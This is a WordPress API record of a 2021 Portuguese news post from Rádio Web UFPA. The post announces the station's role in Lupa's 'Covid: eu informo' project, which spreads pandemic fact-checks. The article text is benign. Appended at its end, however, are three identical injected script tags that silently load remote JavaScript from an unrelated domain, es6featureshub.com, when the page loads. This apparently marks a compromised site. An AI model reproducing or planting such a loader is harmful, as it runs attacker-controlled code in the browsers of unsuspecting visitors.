{"id":8504,"date":"2021-06-25T11:01:17","date_gmt":"2021-06-25T14:01:17","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=8504"},"modified":"2025-10-21T11:31:29","modified_gmt":"2025-10-21T14:31:29","slug":"radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/","title":{"rendered":"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia"},"content":{"rendered":"<p>R\u00e1dios comunit\u00e1rias e universit\u00e1rias de todo o Brasil est\u00e3o reunidas no projeto Covid: eu informo, iniciativa da ag\u00eancia Lupa para divulga\u00e7\u00e3o de conte\u00fado verificado sobre vacinas contra a Covid-19 e outros temas relativos \u00e0 pandemia.<\/p>\n<p>O projeto iniciou recentemente e, at\u00e9 o momento, re\u00fane 20 r\u00e1dios, com emissoras de todas as regi\u00f5es brasileiras e que atingem cidades de diferentes tamanhos. Entre elas, est\u00e1 a R\u00e1dio Web UFPA, que h\u00e1 12 anos desenvolve um trabalho com foco em divulga\u00e7\u00e3o da ci\u00eancia e demais a\u00e7\u00f5es de ensino, pesquisa e extens\u00e3o da Universidade Federal do Par\u00e1.<\/p>\n<p>&#8220;Nosso objetivo \u00e9 sempre levar informa\u00e7\u00e3o de qualidade \u00e0 maior quantidade poss\u00edvel de pessoas. Com o Covid: eu informo buscamos atingir, principalmente, as \u00e1reas conhecidas como desertos de not\u00edcias, onde praticamente n\u00e3o h\u00e1 ve\u00edculos de informa\u00e7\u00e3o de refer\u00eancia&#8221;, explica Nat\u00e1lia Leal, diretora de Conte\u00fado da Lupa. &#8220;Nesses locais, as r\u00e1dios comunit\u00e1rias e universit\u00e1rias s\u00e3o fundamentais no processo informativo, por isso pensamos em atend\u00ea-las e auxili\u00e1-las disponibilizando conte\u00fados que n\u00e3o poder\u00edamos fornecer sem o apoio financeiro do Google.&#8221;<\/p>\n<p>As emissoras participantes t\u00eam acesso \u00e0s checagens da Lupa em formato de texto adaptado \u00e0 linguagem radiof\u00f4nica e tamb\u00e9m em \u00e1udio. Assim, podem incorporar os conte\u00fados \u00e0 sua programa\u00e7\u00e3o da maneira mais adequada \u00e0s suas audi\u00eancias. Al\u00e9m disso, a ag\u00eancia acompanha a difus\u00e3o dos conte\u00fados e mede o impacto das verifica\u00e7\u00f5es junto \u00e0s emissoras da rede e ao p\u00fablico. \u201cEste projeto vai al\u00e9m da entrega de conte\u00fado para republica\u00e7\u00e3o, ele \u00e9 constru\u00eddo junto com essas r\u00e1dios, pois entendemos e respeitamos as singularidades de cada uma&#8221;, afirma Thays Lavor, gerente do Covid: eu informo, que conta, ainda, com produ\u00e7\u00e3o e edi\u00e7\u00e3o da jornalista Schirlei Alves.<\/p>\n<p>No caso da R\u00e1dio Web UFPA, a divulga\u00e7\u00e3o das checagens j\u00e1 est\u00e1 no ar em formato de interprogramas exibidos nos intervalos da toda a programa\u00e7\u00e3o que fica no ar 24h por dia no site da R\u00e1dio. O ouvinte tamb\u00e9m pode conferir todos os programas a qualquer momento em uma <a href=\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/covid-eu-informo\/\">p\u00e1gina especial<\/a> criada para o projeto.<\/p>\n<p>\u201cPara n\u00f3s, \u00e9 uma satisfa\u00e7\u00e3o ter recebido o convite para integrar esse projeto. Sabemos o quanto a desinforma\u00e7\u00e3o tem aumentado durante a pandemia e \u00e9 nosso papel, enquanto projeto que valoriza a ci\u00eancia e a comunica\u00e7\u00e3o, levar ao p\u00fablico conte\u00fado de qualidade sobre esse contexto que envolve a preven\u00e7\u00e3o e o combate \u00e0 Covid-19 e, agora, o processo de imuniza\u00e7\u00e3o da popula\u00e7\u00e3o\u201d, diz Fabr\u00edcio Queiroz, um dos jornalistas respons\u00e1veis pela R\u00e1dio Web UFPA.<\/p>\n<p>A iniciativa da Lupa faz parte de uma parceria com a ONG Redes Cordiais contemplada em um fundo de financiamento de projetos de fact-checking e educa\u00e7\u00e3o midi\u00e1tica do Google News Initiative. A Lupa foi a \u00fanica plataforma de checagem brasileira a receber o apoio do Google nesse financiamento, anunciado em mar\u00e7o.<\/p>\n<p>Al\u00e9m da rede de r\u00e1dios, o projeto conta com um eixo de forma\u00e7\u00e3o de agentes comunit\u00e1rios de sa\u00fade chamado de Vacina: eu informo. Nele, os agentes receber\u00e3o v\u00eddeos sobre como combater a desinforma\u00e7\u00e3o sobre vacinas e se tornar\u00e3o embaixadores da informa\u00e7\u00e3o verificada em suas \u00e1reas de atua\u00e7\u00e3o. O projeto tamb\u00e9m prev\u00ea transmiss\u00f5es ao vivo com influenciadores das cinco regi\u00f5es do pa\u00eds e especialistas para discutir os conte\u00fados falsos sobre vacinas e Covid-19.<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\" aria-label=\"Read more about R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":8474,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_monsterinsights_skip_tracking":false,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[696],"tags":[],"class_list":["post-8504","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-noticias"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O projeto Covid: eu informo \u00e9 uma iniciativa da Lupa que visa ampliar o acesso \u00e0 informa\u00e7\u00e3o verificada sobre a pandemia e as vacinas contra a Covid-19.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O projeto Covid: eu informo \u00e9 uma iniciativa da Lupa que visa ampliar o acesso \u00e0 informa\u00e7\u00e3o verificada sobre a pandemia e as vacinas contra a Covid-19.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-25T14:01:17+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:31:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"675\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia\",\"datePublished\":\"2021-06-25T14:01:17+00:00\",\"dateModified\":\"2025-10-21T14:31:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\"},\"wordCount\":616,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1\",\"articleSection\":[\"UFPA Not\u00edcias\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\",\"name\":\"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1\",\"datePublished\":\"2021-06-25T14:01:17+00:00\",\"dateModified\":\"2025-10-21T14:31:29+00:00\",\"description\":\"O projeto Covid: eu informo \u00e9 uma iniciativa da Lupa que visa ampliar o acesso \u00e0 informa\u00e7\u00e3o verificada sobre a pandemia e as vacinas contra a Covid-19.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1\",\"width\":675,\"height\":400},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia - Radio Web UFPA","description":"O projeto Covid: eu informo \u00e9 uma iniciativa da Lupa que visa ampliar o acesso \u00e0 informa\u00e7\u00e3o verificada sobre a pandemia e as vacinas contra a Covid-19.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/","og_locale":"pt_BR","og_type":"article","og_title":"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia - Radio Web UFPA","og_description":"O projeto Covid: eu informo \u00e9 uma iniciativa da Lupa que visa ampliar o acesso \u00e0 informa\u00e7\u00e3o verificada sobre a pandemia e as vacinas contra a Covid-19.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2021-06-25T14:01:17+00:00","article_modified_time":"2025-10-21T14:31:29+00:00","og_image":[{"width":675,"height":400,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1","type":"image\/png"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia","datePublished":"2021-06-25T14:01:17+00:00","dateModified":"2025-10-21T14:31:29+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/"},"wordCount":616,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1","articleSection":["UFPA Not\u00edcias"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/","name":"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1","datePublished":"2021-06-25T14:01:17+00:00","dateModified":"2025-10-21T14:31:29+00:00","description":"O projeto Covid: eu informo \u00e9 uma iniciativa da Lupa que visa ampliar o acesso \u00e0 informa\u00e7\u00e3o verificada sobre a pandemia e as vacinas contra a Covid-19.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1","width":675,"height":400},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/radio-web-ufpa-integra-projeto-para-difundir-checagens-sobre-pandemia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"R\u00e1dio Web UFPA integra projeto para difundir checagens sobre a pandemia"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/06\/COVID-EU-INFORMO-THUMB.png?fit=675%2C400&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2da","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=8504"}],"version-history":[{"count":7,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8504\/revisions"}],"predecessor-version":[{"id":17562,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8504\/revisions\/17562"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/8474"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=8504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=8504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=8504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}